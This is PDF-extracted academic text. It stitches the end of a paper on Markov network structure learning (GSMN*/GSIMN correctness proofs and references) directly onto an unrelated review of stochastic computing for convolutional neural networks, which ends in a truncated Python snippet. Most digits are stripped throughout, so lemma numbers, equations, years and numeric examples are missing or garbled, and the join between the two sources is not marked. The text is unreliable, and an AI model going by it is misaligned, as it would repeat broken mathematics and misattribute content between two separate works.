in this paper we presented two algorithms, gsmn∗ and gsimn, for efficiently learning the structure of a markov network of a domain from data using the independence-based approach (as opposed to np-hard algorithms based on maximum likelihood estimation). we evaluated their performance through measurement of the weighted number of tests they require to learn the structure of the network and the quality of the networks learned from both artificial and real-world data sets. gsimn showed a decrease in the weighted number of tests in the vast majority of artificial and real-world domains, with an output network quality comparable to that of gsmn∗ and some cases showing improvement. in addition, gsimn was shown to be nearly optimal in the number of tests executed compared to gsimn-fch, which uses an exhaustive search to produce all independence information that can be inferred from pearl's axioms. some directions of future research include an investigation into the way the topology of the underlying markov network affects the number of tests required and the quality of the resulting network, especially for commonly occurring topologies such as grids. another research topic is the impact of other examination and grow orderings of the variables on the number of tests.
acknowledgments
we thank adrian silvescu for insightful comments on accuracy measures and general advice on the theory of undirected graphical models.
appendix a. correctness of gsmn∗
for each variable x ∈ v examined during the main loop of the gsmn∗ algorithm (lines – ), the set bx of variable x ∈ v is constructed by growing and shrinking a set s, starting from the empty set. x is then connected to each member of bx to produce the structure of a markov network. we prove that this procedure returns the actual markov network structure of the domain. for the proof of correctness we make the following assumptions.
• the axioms of eqs. ( ) hold.
• the probability distribution of the domain is strictly positive (required for the intersection axiom to hold).
• tests are conducted by querying an oracle, which returns its true value in the underlying model.
the algorithm examines every variable y ∈ λx for inclusion to s (and thus to bx) during the grow phase (lines to ) and, if y was added to s during the grow phase, it considers it for removal during the shrinking phase (lines to ). note that there is only one test executed between x and y during the growing phase of x; we call this the grow test of y on x (line ).
similarly, there is one or no tests executed between x and y during the shrinking phase; this test (if executed) is called the shrink test of y on x (line ). the general idea behind the proof is to show that, while learning the blanket of x, variable y is in s by the end of the shrinking phase if and only if the dependence (x ⊥⊥y | v −{x, y }) between x and y holds (which, according to theorem at the end of the appendix, implies there is an edge between x and y ). we can immediately prove one direction. lemma . if y /∈ s at the end of the shrink phase, then (x⊥⊥y | v −{x, y }). proof. let us assume that y /∈ s by the end of the shrink phase. then, either y was not added to set s during the grow phase (i.e., line was never reached), or removed from it during the shrink phase (i.e., line was reached). the former can only be true if (pxy > α) in line (indicating x and y are unconditionally independent) or y was found independent of x in line . the latter can only be true if y was found independent of x in line . in all cases then ∃a ⊆ v−{x, y } such that (x⊥⊥y | a), and by strong union then (x⊥⊥y | v −{x, y }). the opposite direction is proved in lemma below. however, its proof is more involved, requiring a few auxiliary lemmas, observations, and definitions. the two main auxiliary lemmas are and . both use the lemma presented next (lemma ) inductively to extend the conditioning set of dependencies found by the grow and shrink tests between x and y , to all the remaining variables v−{x, y }. the lemma shows that, if a certain independence holds, the conditioning set of a dependence can be increased by one variable. lemma . let x, y ∈ v, z ⊆ v −{x, y }, and z′ ⊆ z. then ∀w ∈ v, (x ⊥⊥y | z) and (x⊥⊥w | z′ ∪{y }) =⇒ (x ⊥⊥y | z ∪{w}). efficient markov network structure discovery using independence tests proof. we prove by contradiction, and make use of the axioms of intersection (i), strong union (su), and decomposition (d). let us assume that (x ⊥⊥y | z) and (x⊥⊥w | z′∪{y }) but (x⊥⊥y | z ∪{w}). then (x⊥⊥y | z ∪{w}) and (x⊥⊥w | z′ ∪{y }) su =⇒ (x⊥⊥y | z ∪{w}) and (x⊥⊥w | z ∪{y }) i =⇒ (x⊥⊥{y, w} | z) d =⇒ (x⊥⊥y | z) ∧ (x⊥⊥w | z) =⇒ (x⊥⊥y | z). this contradicts the assumption (x ⊥⊥y | z). we now introduce notation and definitions and prove auxiliary lemmas. we denote by sg the value of s at the end of the grow phase (line ) i.e., the set of variables found dependent of x during the grow phase, and by ss the value of s at the end of the shrink phase (line ). we also denote by g the set of variables found independent of x during the grow phase and by u = [u , . . . , uk] the sequence of variables shrunk from bx , i.e., found independent of x during the shrink phase. the sequence u is assumed ordered as follows: if i < j then variable ui was found independent from x before uj during the shrinking phase. a prefix of the first i variables [u , . . . , ui− ] of u is denoted by ui. for some test t performed during the algorithm, we define k(t) as the integer such that uk(t) is the prefix of u containing the variables that were found independent of x in this loop before t. furthermore, we abbreviate uk(t) by ut. from the definition of u and the fact that in the grow phase the conditioning set increases by dependent variables only, we can immediately make the following observation: observation . for some variable ui ∈ u, if t denotes the shrink test performed between x and ui then ut = ui− . we can then relate the conditioning set of the shrink test t with ut as follows: lemma . 
if y ∈ ss and t = (x, y | z) is the shrink test of y , then z = sg −ut −{y }. proof. according to line of the algorithm, z = s−{y }. at the beginning of the shrink phase (line ) s = sg, but variables found independent afterward and until t is conducted are removed from s in line . thus, by the time t is performed, s = sg − ut and the conditioning set becomes sg − ut −{y }. corollary . (x⊥⊥ui | sg − ui). proof. the proof follows immediately from lemma , observation , and the fact that ui = ui− ∪{ui}. the following two lemmas use lemma inductively to extend the conditioning set of the dependence between x and a variable y in ss . the first lemma starts from the shrink test between x and y (a dependence), and extends its conditioning set from ss −{y } (or equivalently sg −{y }− ut according to lemma ) to sg −{y }. bromberg, margaritis, & honavar lemma . if y ∈ ss and t is the shrink test of y , then (x ⊥⊥y | sg −{y }). proof. the proof proceeds by proving (x ⊥⊥y | sg −{y }− ui) by induction on decreasing values of i, for i ∈ { , , . . . , k(t)}, starting at i = k(t). the lemma then follows for i = by noticing that u = ∅. • base case (i = k(t)): from lemma , t = (x, y | sg −{y }− ut), which equals (x, y | sg −{y }−uk(t)) by definition of ut. since y ∈ ss , it must be the case that t was found dependent, i.e., (x ⊥⊥y | sg −{y }− uk(t)). • inductive step: let us assume that the statement is true for i = m, < m ≤ k(t)− : (x ⊥⊥y | sg −{y }− um). ( ) we need to prove that this is also true for i = m − : (x ⊥⊥y | sg −{y }− um− ). by corollary , we have (x⊥⊥um | sg − um) and by strong union, (x⊥⊥um | (sg − um) ∪{y }) or (x⊥⊥um | (sg − um −{y }) ∪{y }). ( ) from eqs. ( ), ( ) and lemma we get the desired relation: (x ⊥⊥y | (sg −{y }− um) ∪{um}) = (x ⊥⊥y | sg −{y }− um− ). observation . by definition of sg, we have that for every test t = (x, y | z) performed during the grow phase, z ⊆ sg. the following lemma completes the extension of the conditioning set of the dependence between x and y ∈ ss into the universe of variables v −{x, y }, starting from sg −{y } (where lemma left off) and extending it to sg ∪ g −{y }. lemma . if y ∈ ss, then (x ⊥⊥y | sg ∪ g −{y }). proof. the proof proceeds by proving (x ⊥⊥y | sg ∪ gi −{y }) by induction on increasing values of i from to |g|, where gi denotes the first i elements of an arbitrary ordering of set g. efficient markov network structure discovery using independence tests • base case (i = ): follows directly from lemma for i = , since g = ∅. • inductive step: let us assume that the statement is true for i = m, ≤ m < |g|: (x ⊥⊥y | sg ∪ gm −{y }). ( ) we need to prove that it is also true for i = m + : (x ⊥⊥y | sg ∪ gm+ −{y }). ( ) from observation the grow test of gm results in the independence: (x⊥⊥gm | z), where z ⊆ sg. by the strong union axiom this can become: (x⊥⊥gm | z ∪{y }), where z ⊆ sg ( ) or equivalently (x⊥⊥gm | (z −{y }) ∪{y }), where z ⊆ sg. ( ) since z ⊆ sg ⊆ sg ∪ gm, we have that z −{y } ⊆ sg ∪ gm, and so from eq. ( ) and lemma we get the desired relation: (x ⊥⊥y | (sg ∪ gm −{y }) ∪ gm) = (x ⊥⊥y | sg ∪ gm+ −{y }). finally, we can prove that x is dependent with every variable y ∈ ss given the universe v −{x, y }. lemma . if y ∈ ss, then (x ⊥⊥y | v −{x, y }). proof. from lemma , (x ⊥⊥y | sg ∪ g −{y }) it suffices then to prove that sg ∪ g −{y } = v −{x, y }. in loop – of gsmn ∗, the queue λx is populated with all elements in v −{x}, and then, in line , y is removed from λx . 
the grow phase then partitions λx into variables dependent of x (set sg) and independent of x (set g). corollary . y ∈ ss ⇐⇒ (x ⊥⊥y | v −{x, y }). proof. follows directly from lemmas and . from the above corollary we can now immediately show that the graph returned by connecting x to each member of bx = ss is exactly the markov network of the domain using the following theorem, first published by pearl and paz ( ). theorem . (pearl & paz, ) every dependence model m satisfying symmetry, decom- position, and intersection (eqs. ( )) has a unique markov network g = (v, e) produced by deleting from the complete graph every edge (x, y ) for which (x⊥⊥y | v −{x, y }) holds in m , i.e., (x, y ) /∈ e ⇐⇒ (x⊥⊥y | v −{x, y }) in m . bromberg, margaritis, & honavar appendix b. correctness of gsimn the gsimn algorithm differs from gsmn∗ only by the use of test subroutine igsimn instead of igsmn∗ (algorithms and , respectively), which in turn differs by a number of additional inferences conducted to obtain the independencies (lines to ). these inferences are direct applications of the strong union axiom (which holds by assumption) and the triangle theorem (which was proven to hold in theorem ). using the correctness of gsmn∗ (proven in appendix a) we can therefore conclude that the gsimn algorithm is correct. references abbeel, p., koller, d., & ng, a. y. ( ). learning factor graphs in polynomial time and sample complexity. journal of machine learning research, , – . acid, s., & de campos, l. m. ( ). searching for bayesian network structures in the space of restricted acyclic partially directed graphs. journal of artificial intelligence research, , – . agresti, a. ( ). categorical data analysis ( nd edition). wiley. aliferis, c. f., tsamardinos, i., & statnikov, a. ( ). hiton, a novel markov blanket algorithm for optimal variable selection. in proceedings of the american medical informatics association (amia) fall symposium. anguelov, d., taskar, b., chatalbashev, v., koller, d., gupta, d., heitz, g., & ng, a. ( ). discriminative learning of markov random fields for segmentation of d range data. in proceedings of the conference on computer vision and pattern recognition (cvpr). barahona, f. ( ). on the computational complexity of ising spin glass models. journal of physics a: mathematical and general, ( ), – . besag, j. ( ). spacial interaction and the statistical analysis of lattice systems. journal of the royal statistical society, series b, , – . besag, j., york, j., & mollie, a. ( ). bayesian image restoration with two applications in spatial statistics.. annals of the institute of statistical mathematics, , – . bromberg, f., margaritis, d., & honavar, v. ( ). efficient markov network structure dis- covery from independence tests. in proceedings of the siam international conference on data mining. buntine, w. l. ( ). operations for learning with graphical models. journal of artificial intelligence research, , – . castelo, r., & roverato, a. ( ). a robust procedure for gaussian graphical model search from microarray data with p larger than n. journal of machine learning research, , – . chow, c., & liu, c. ( ). approximating discrete probability distributions with depen- dence trees. ieee transactions on information theory, ( ), – . efficient markov network structure discovery using independence tests cochran, w. g. ( ). some methods of strengthening the common χ tests. biometrics, , – . della pietra, s., della pietra, v., & lafferty, j. ( ). inducing features of random fields. 
ieee transactions on pattern analysis and machine intelligence, ( ), – . dobra, a., hans, c., jones, b., nevins, j. r., yao, g., & west, m. ( ). sparse graphical models for exploring gene expression data. journal of multivariate analysis, , – . edwards, d. ( ). introduction to graphical modelling ( nd edition). springer, new york. friedman, n., linial, m., nachman, i., & pe’er, d. ( ). using bayesian networks to analyze expression data. computational biology, , – . geman, s., & geman, d. ( ). stochastic relaxation, gibbs distributions, and the bayesian relation of images.. ieee transactions on pattern analysis and machine intelligence, , – . heckerman, d. ( ). a tutorial on learning bayesian networks. tech. rep. msr-tr- - , microsoft research. heckerman, d., geiger, d., & chickering, d. m. ( ). learning bayesian networks: the combination of knowledge and statistical data. machine learning, , – . henrion, m. ( ). propagation of uncertainty by probabilistic logic sampling in bayes’ networks. in lemmer, j. f., & kanal, l. n. (eds.), uncertainty in artificial intelli- gence . elsevier science publishers b.v. (north holland). hofmann, r., & tresp, v. ( ). nonlinear markov networks for continuous variables. in neural information processing systems, vol. , pp. – . isard, m. ( ). pampas: real-valued graphical models for computer vision. in ieee conference on computer vision and pattern recognition, vol. , pp. – . jerrum, m., & sinclair, a. ( ). polynomial-time approximation algorithms for the ising model. siam journal on computing, , – . kearns, m. j., & vazirani, u. v. ( ). an introduction to computational learning theory. mit press, cambridge, ma. koller, d., & sahami, m. ( ). toward optimal feature selection. in international con- ference on machine learning, pp. – . lam, w., & bacchus, f. ( ). learning bayesian belief networks: an approach based on the mdl principle. computational intelligence, , – . lauritzen, s. l. ( ). graphical models. oxford university press. margaritis, d., & thrun, s. ( ). bayesian network induction via local neighborhoods. in solla, s., leen, t., & müller, k.-r. (eds.), advances in neural information processing systems , pp. – . mit press. mccallum, a. ( ). efficiently inducing features of conditional random fields. in pro- ceedings of uncertainty in artificial intelligence (uai). bromberg, margaritis, & honavar newman, d. j., hettich, s., blake, c. l., & merz, c. j. ( ). uci repository of machine learning databases. tech. rep., university of california, irvine, dept. of information and computer sciences. peña, j. m. ( ). learning gaussian graphical models of gene networks with false dis- covery rate control. in proceedings of the th european conference on evolutionary computation, machine learning and data mining in bioinformatics, pp. – . pearl, j. ( ). probabilistic reasoning in intelligent systems: networks of plausible in- ference. morgan kaufmann publishers, inc. pearl, j., & paz, a. ( ). graphoids: a graph-based logic for reasoning about releveance relations. tech. rep. (r- -l), cognitive systems laboratory, university of california. rebane, g., & pearl, j. ( ). the recovery of causal poly-trees from statistical data. in kanal, l. n., levitt, t. s., & lemmer, j. f. (eds.), uncertainty in artificial intelligence , pp. – , amsterdam. north-holland. schäfer, j., & strimmer, k. ( ). an empirical bayes approach to inferring large-scale gene association networks. bioinformatics, , – . scott, d. w. ( ). multivariate density estimation. 
wiley series in probability and mathematical statistics. john wiley & sons.
shekhar, s., zhang, p., huang, y., & vatsavai, r. r. ( ). in kargupta, h., joshi, a., sivakumar, k., & yesha, y. (eds.), trends in spatial data mining, chap. , pp. – . aaai press / the mit press.
spirtes, p., glymour, c., & scheines, r. ( ). causation, prediction, and search ( nd edition). adaptive computation and machine learning series. mit press.
srebro, n., & karger, d. ( ). learning markov networks: maximum bounded tree-width graphs. in acm-siam symposium on discrete algorithms.
tsamardinos, i., aliferis, c. f., & statnikov, a. ( a). algorithms for large scale markov blanket discovery. in proceedings of the th international flairs conference, pp. – .
tsamardinos, i., aliferis, c. f., & statnikov, a. ( b). time and sample efficient discovery of markov blankets and direct causal relations. in proceedings of the th acm sigkdd international conference on knowledge discovery and data mining, pp. – .
tsamardinos, i., brown, l. e., & aliferis, c. f. ( ). the max-min hill-climbing bayesian network structure learning algorithm. machine learning, , – .
whittaker, j. ( ). graphical models in applied multivariate statistics. john wiley & sons, new york.
submitted august , accepted october , published november . corresponding author: zaini abdul halim, zaini@usm.my. academic editor: shuihua wang. copyright lee and abdul halim, distributed under creative commons cc-by.
stochastic computing in convolutional neural network implementation: a review
yang yang lee and zaini abdul halim
school of electrical and electronic engineering, universiti sains malaysia, nibong tebal, penang, malaysia
abstract
stochastic computing (sc) is an alternative computing domain to ubiquitous deterministic computing whereby a single logic gate can perform an arithmetic operation by exploiting the nature of probability math. sc was proposed in the s when binary computing was expensive. however, sc has recently started to regain interest after the widespread adoption of deep learning applications, specifically the convolutional neural network (cnn) algorithm, due to its practicality in hardware implementation. although not all computing functions can translate to the sc domain, several useful function blocks related to the cnn algorithm have been proposed and tested by researchers. an evolution of cnn, namely, the binarised neural network, has also gained attention in edge computing due to its compactness and computing efficiency. this study reviews various sc cnn hardware implementation methodologies. firstly, we review the fundamental concepts of sc and the circuit structure and then compare the advantages and disadvantages amongst different sc methods. finally, we conclude the overview of sc in cnn and make suggestions for widespread implementation.
subjects artificial intelligence, computer architecture, data mining and machine learning, embedded computing, real-time and embedded systems
keywords stochastic computing, convolutional neural network, deep learning, fpga, iot
introduction
deep learning algorithms have been widely and silently integrated into our daily life; for example, image enhancer, voice search and linguistic translation.
meanwhile, the internet of things (iot) has gained industrial recognition, and many applications rely on edge computing whereby data are processed on the fly rather than relayed to cloud computing for reliability and security reasons (naveen & kounte, ). people have been heavily dependent on a widely accessible central processing unit (cpu) and general- purpose graphics processing unit (gpu) for deep learning research and application deployment. although users strive to achieve great real-time response by offloading many computationally intensive tasks, such as object recognition to edge devices, those computing devices become extremely inefficient despite the utmost priority of power efficiency in iot. although the field-programmable gate array (fpga) and application-specific integrated circuit (asic) could overcome the power efficiency issue, economically implementing deep learning hardware logic is not ideal. thus, researchers are trying to explore alternatives to conventional binary in this specific use case, driving the rise of stochastic computing (sc). how to cite this article lee yy, abdul halim z. . stochastic computing in convolutional neural network implementation: a review. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:zaini@usm.my https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. sc was proposed in the s when the cost of implementing binary computing was prohibitive but soon ran out of favour in the semiconductor industry. unlike binary computing, sc can perform the arithmetic operation with a single logic gate. the most evident advantage of sc is its ability to reduce the area and power draw by reducing the number of active transistors (de aguiar & khatri, ). sc is also an inherently progressive precision where the output converges from the most significant figure; thus, sc is capable of making early decision termination (edt). power efficiency and edt capability make deep learning application favourable (kim et al., ), particularly in convolutional neural network (cnn) application. cnn received extensive development since its introduction in due to its unprecedented performance in object recognition. cnn model development was trending from being deep and massive (highly accurate) to responsive (fast inference). in response to the iot requirements in edge computing, researchers had attempted to reduce the math precision to save computing resources. with a reasonable trade-off for accuracy, an extreme simplification version of cnn, that is, binarised neural network (bnn), emerged with a promising hardware implementation capability and computing efficiency, rivalling sc methodology. sc in cnn lacks widespread attention due to its cross-disciplinary nature in the computer science study. cnn is impactful in the field of machine learning, but the rising of iot edge computing which pursues efficient computing pushed back cnn implementation hard. while many researchers focus on innovating cnn algorithms for different use cases such as medicine and agriculture, only a few of them consider how to implement cnn realistically since cnn execution is computationally intensive by itself. 
given that no comprehensive and updated review exists on this specific area, in this review paper we thus attempt to investigate and survey the sc implementation in the cnn application. review methodology this review intends to answer the following research questions: ( ) what are the major developments of sc elements and sc cnn in recent years? due to the narrow field of study in sc, the related studies are scattered, let alone the sc in cnn implementation; thus, impede the development of sc cnn without a more centralised reference, increasing difficulty in identifying the research trends. ( ) how exactly is the cnn being computed/executed in the stochastic domain? sc is a unique computing methodology which is not often being mentioned in the academic study, despite its unique advantage in the surge of cnn application. thus, there is a need to have a big picture on the sc cnn mechanism. ( ) what are the open problems and/or opportunities to implement sc cnn? sc cnn does have its implementation hurdles. thus, it is necessary to summarise them before moving forward in this field of research. with the research questions in mind, we first reviewed the basic concepts of sc and cnn in modern perspectives. it is necessary to understand the background of sc and cnn due to the vastly different field of studies between them. moreover, there is a need to lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. aggregate the knowledge of sc elements in the face of rising trends in sc developments. then we examined the recent developments and contributions of sc in cnn computation and compared the implementation methodologies across various recent studies. finally, we made a conclusion and some suggestions for the future of deep learning research in the sc domain. search criteria an initial search was carried out to identify an initial set of papers which have the prior works on sc and cnn in hardware implementation. the search strings were then inferred and developed as follows: (‘stochastic computing’) or (‘stochastic computing deep learning’) or (‘stochastic computing convolutional neural network’) or (‘stochastic computing neural network’) or (‘stochastic computing image processing’) ‘stochastic’ alone has a lot of meaning in a wide area of study. thus, the keyword of ‘stochastic computing’ is a necessity to narrow down the search scope. the search strings were applied to the indexed scientific database scopus and web of science (peer-reviewed). domain-oriented databases (acm digital library, ieee xplore digital library) were also referred extensively. finally, google scholar (limited to peer-reviewed papers) were used to find any omitted academic literature, especially in this multi-disciplinary search scope. peer-reviewed articles were preferred to ensure only confirmed works were to be summarised in this review paper. scope of review notably, sc is not the only methods existed for efficient cnn computing. we only cover the topics of sc and sc related to cnn computing in this review study. many articles may not directly involve cnns, but their novel sc elements are worthy as part of the significant sc developments and potentially useful for the future sc cnn function blocks, thus, will be mentioned in this review. some elemental studies on cnns were referred to understand the nature of cnn algorithms better. 
some surveys on cnn implementation in fpga merely or never discuss the sc, but they shared a similar concern on efficient cnn computation. thus, their surveys were also considered and referred to in this review study if any. basic concepts sc and cnn are different fields of studies and worth a separate explanation. thus, sc will be described first, then secondly cnn and bnn will be explained. lastly, the competitive relationship between sc and bnn implementations will be discussed. sc is a unique concept of computing relative to traditional binary computing and has to be understood before an in-depth discussion on sc implementation in cnn at the next section. sc sc is favourable in iot application due to its extreme simplicity of computing elements, where power efficiency is of utmost priority. unlike deterministic computing that tolerates lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. x>y y x comparator stochastic  logic circuits outstream counter random  number  generator binary number binary  number binary domain stochastic domain binary domain stochastic bitstream figure process of sc and its elements. full-size doi: . /peerjcs. /fig-  ( / )  ( / ) s s  ( / ) s s s d c enb multiplexer  ( / )  ( / )  ( / )  ( / )s s s s  ( / )  ( / ) s s  ( / ) s  ( / )  ( / ) s s  ( / ) s a b c d figure sc arithmetic operation. (a)and gate as sc unipolar multiplier. (b) mux as sc scaled adder. (c) uncorrelated bit streams give accurate output. (d) correlated bit streams give inaccurate output. full-size doi: . /peerjcs. /fig- absolutely no error, sc allows errors to a certain degree, thus the name approximate computing. sc initially decodes a binary number into a bitstream in such a way that the frequency of ’s bit represents the magnitude of value. for example, [ , , , , , , , ] stochastic stream is equal to / or . because it has three ’s bits. then, the number can be computed in the stochastic domain with a simple logic gate instead of gate combinations in the binary domain. finally, the stochastic stream will be converted back to binary numbers with a simple counter by counting the frequency of ’s bit, as shown in fig. . sc took advantage of probability math to reduce the logic components required to perform an arithmetic operation. taking figs. a and b as examples, in the and gate multiplication operation, the output can be defined as: s =p(s )=p(s )p(s )=s ×s . ( ) in the case of addition operation, the output will be scaled by half with mux select input with a bitstream value of . . the mux scaled adder can be defined as: s =p(s )p(s )+( −p(s ))p(s )= p(s )+p(s ) = s +s ,p(s )= . , ( ) lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. where p is the probability of the stochastic stream. the and gate multiplier only applies to unipolar math where the real number ∈ [ , ]. in the case of bipolar math where real number ∈ [− , ] ( ’s bit decodes as − ), the xnor gate can be used as a multiplier, whereas the same mux can function as a bipolar adder. the stochastic number generator (sng) becomes the heart of the sc to perform arithmetic operations in the stochastic domain. sng consists of a random number generator (rng) and a comparator; both worked synchronously to generate stochastic bitstream from a given binary number. 
However, the RNG was the biggest challenge in earlier SC circuit design because the correlation between the operating bitstreams plays a great role in SC accuracy. An SC output will be accurate only if the two working streams are uncorrelated. Taking panels (c) and (d) of the SC arithmetic operation figure as examples, two different bitstreams can represent the same value, yet the output in panel (d) is far from accurate because of its high correlation with the opposite bitstream. Zero correlation between two bitstreams can be expressed as:

$\sum_{i=1}^{n} S_1(i)\,S_2(i) = \frac{\sum_{i=1}^{n} S_1(i) \times \sum_{i=1}^{n} S_2(i)}{n},$

where S is the respective stochastic bitstream and n is the bit length. Thus, the accuracy is highly dependent on the randomness and the length of the stochastic streams. Nevertheless, not all SC elements are sensitive to stochastic correlation; the MUX scaled adder is one example (Alaghi, Qian & Hayes, ).

Presently, a pseudo-random RNG called the linear-feedback shift register (LFSR) is widely accepted because of its simple design and effectiveness in lowering bitstream correlation (Alaghi & Hayes, ). An LFSR consists of a feedback XOR gate and a bit-shift register. The register is initialised with a specific seed value and then generates a pseudo-random binary value on every bit-shifting clock cycle. The binary number generated by the RNG is compared with the user-input binary number. Two circuits can be used as the comparator, namely the binary comparator and the weighted binary generator (WBG); both are capable of generating a stochastic bitstream. After the stochastic stream has passed through the stochastic logic circuits, the computed streams can be converted back to the binary domain with a simple flip-flop counter.

Figure: SNG components. (a) RNG with LFSR. (b) True comparator. (c) WBG.

SC never stops improving and keeps achieving good accuracy whilst using less area and power. The SNG is the major overhead of an SC circuit. As such, Ichihara et al. ( ) proposed a circular shifting technique to share LFSRs. Kim, Lee & Choi ( a) then proposed a method very similar to memoisation to reduce the number of LFSRs in large-scale SC. Xie et al. ( ) attempted to share an LFSR through a wire-exchange technique with additional random bit flips, whereas Joe & Kim ( ) proposed a symmetrical exchange of odd and even wires. Even better, Salehi ( ) showed that simple wire permutation paired with a WBG could deliver the lowest correlation index, achieving good accuracy whilst requiring fewer logic gates. Interestingly, Chen, Ting & Hayes ( ) replaced the LFSR with an up-counter in conjunction with a WBG to take advantage of the WBG's binary weighting characteristics and so assure the progressive-precision behaviour of SC; as such, zero-error EDT is achievable without extra hardware cost. The WBG can also be shared partially because some WBG logic can be redundant (Yang et al., ).

More advanced operations, such as square, division and non-linear functions, have also gained attention and innovation to fit modern applications. The stochastic square is already in its simplest form: squaring a stochastic stream can be conducted by delaying the input stream with a D flip-flop before multiplying it with itself.
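Stepping back to the SNG just described, the sketch below is an illustrative software model (an assumption made for demonstration, not any author's netlist) of an LFSR feeding a comparator; the 8-bit width, tap positions and seed values are choices made only for this example.

```python
# Illustrative model of an LFSR-based SNG: an 8-bit Fibonacci LFSR supplies
# pseudo-random numbers and a comparator turns them into a stochastic bitstream.
def lfsr8(seed, n):
    """Generate n pseudo-random 8-bit values; taps 8, 6, 5, 4 correspond to the
    commonly used maximal-length polynomial x^8 + x^6 + x^5 + x^4 + 1."""
    state, samples = seed & 0xFF, []
    for _ in range(n):
        samples.append(state)
        feedback = ((state >> 7) ^ (state >> 5) ^ (state >> 4) ^ (state >> 3)) & 1
        state = ((state << 1) | feedback) & 0xFF
    return samples

def sng(value, seed, length=255):
    """Comparator stage: emit a 1 whenever the LFSR sample is below the 8-bit
    input value, so P(bit = 1) is roughly value / 256."""
    return [1 if r < value else 0 for r in lfsr8(seed, length)]

x = sng(96, seed=0b1010_1100)     # encodes roughly 0.375
y = sng(160, seed=0b0101_0011)    # encodes roughly 0.625
print(sum(x) / len(x), sum(y) / len(y))

# AND-gate multiplication; how close this lands to the exact product depends on
# how decorrelated the two streams are, which is exactly the concern above.
product = sum(a & b for a, b in zip(x, y)) / len(x)
print(product, 0.375 * 0.625)
```

Different seeds (or the wire-permutation and sharing tricks cited above) are what keep the two operand streams decorrelated enough for the AND-gate multiplier to stay accurate.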
In the case of a non-linear function such as the hyperbolic tangent (tanh), stochastic tanh (Stanh) uses a K-state finite state machine (FSM). An FSM is a class of logic circuit that produces a specific logical output pattern only once the input has reached a designated sequential threshold. The Stanh function can be described as:

$\mathrm{Stanh}(K, x) = \tanh\!\left(\frac{Kx}{2}\right),$

where K is the number of states (which must be a multiple of 2) and x is the input stream. Brown & Card ( ) showed that the Stanh function responds closely to the true tanh function with K = . However, too many states result in random-walk behaviour (Kim et al., ); thus, an optimum number of states for accurate reproduction of the tanh function exists in the stochastic domain. Improvements in FSM design can also emulate linear and exponential functions (Najafi et al., ).

Figure: SC with advanced arithmetic operations. (a) Stochastic squaring with a D flip-flop. (b) K-state FSM for the Stanh function, which is widely utilised in SC CNN.

The real challenge in SC (and also its missing part) is the stochastic divider design. Stochastic division traditionally used an FSM with extra SNG components in a gradient-descent approach, but the gradient-descent convergence time incurred inaccuracy in the output. A newer SC divider from Chen & Hayes ( ) exploits stochastic correlation properties to perform stochastic division without using expensive SNGs. This is possible because, if stochastic streams P(X) and P(Y) are perfectly correlated and P(X) < P(Y), then by probability math:

$P(X=1, Y=1) = P(X=1).$

Given that the conditional probability P(X=1 | Y=1) (the probability of X = 1 given that Y = 1) can also be expressed as:

$P(X=1 \mid Y=1) = \frac{P(X=1, Y=1)}{P(Y=1)} = \frac{P(X)}{P(Y)},$

the desired divider function in the SC domain is derived as a result. Hence, stochastic division can be performed, provided both stochastic streams are perfectly correlated, by evaluating the conditional probability of X and Y. In the case of P(X) > P(Y), the output is clipped to a value of 1. Chu ( ) improved the circuit by using a JK flip-flop, but only for unipolar SC division.

Figure: SC divider circuits. (a) Former gradient-descent unipolar divider. (b) Former SC bipolar divider. (c) Newer SC unipolar divider exploiting correlation. (d) Newer SC bipolar divider adding sign information.

The overall structure of SC is thus explained. Besides the benefit of power efficiency, SC is also inherently error resilient: accidental bit flips do not affect the overall operation of the stochastic circuits, whereas they could be catastrophic in deterministic computing. Secondly, SC has inherently progressive precision, whereby the output value converges from the most significant figures: the leading digits of the output appear first during the stochastic compute cycles, whereas conventional binary arithmetic produces the least significant bits first. This characteristic is useful in specific applications, such as weather forecasting, where only the most significant figure matters in decision making; thus, performing EDT in SC without waiting for the complete computation is possible.

With that said, the simplicity of SC comes at a cost. Increasing math precision in SC requires long bit lengths, which increases computing latency exponentially: representing an n-bit binary value generally needs a stochastic stream of 2^n bits, so doubling the numerical precision squares the required stream length. SC has therefore become unfavourable for modern computation needs in the face of the ever-increasing efficiency of binary computing. Nevertheless, certain niche applications can still benefit from the SC topology, such as low-density parity-check decoders in noisy data-transmission environments; robust image-processing tasks, such as gamma correction and Sobel edge detection (Joe & Kim, ); and the recent interest in the CNN algorithm.

CNN
With the advancement of computing technology, many applications rely heavily on probabilistic computation. The deep neural network (DNN) is a widely accepted class of machine learning algorithms for processing complex information such as images and videos. A DNN consists of layers of additions and multiplications of numerical weights that end up computing dimensionless probability values for the output classes, which in turn allow the computer to decide based on the output value. Many DNN variations exist, each for a particular purpose, such as the CNN for image processing and long short-term memory for natural-language processing. The CNN, for example, can reduce multidimensional images into simple classes; thus, it is very popular in image classification and object recognition.

The most distinctive component that discriminates the CNN from other DNN algorithms is its convolution layer. A CNN can reduce large matrices into a single-value representation, which explains its superior capability for dimensional reduction in image processing.

Figure: CNN's convolution and activation. (a) Matrix convolution. (b) Neural network model after the convolution. (c) Architecture of the classical LeNet CNN.

The convolution process can be generalised as:

$y_j^l = f\!\left(x_j^l\right) = f\!\left(\sum_{i=1}^{n}\left(x_i^{l-1} \times w_{ij}^{l-1}\right) + b_j^l\right),$

where $x_j^l$ is the convolved feature of the next layer, $x_i^{l-1}$ is the feature from the previous layer, $w_{ij}^{l-1}$ is the kernel weight matrix, and $b_j^l$ is the bias. Here l is the layer number, i denotes the scan-window number, n is the total number of scan windows, and j is the depth of the next feature map. After the convolution comes the activation function $f(x_j^l)$, which can be a linear or non-linear function.
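For readers less familiar with the convolution equation above, the short NumPy sketch below shows how one feature-map pixel is produced from a scan window; the image size, kernel values and the tanh activation are assumptions chosen only for illustration.

```python
# Plain software illustration of y = f(sum_i(x_i * w_i) + b) over scan windows.
import numpy as np

def conv2d_single_channel(image, kernel, bias, activation=np.tanh):
    kh, kw = kernel.shape
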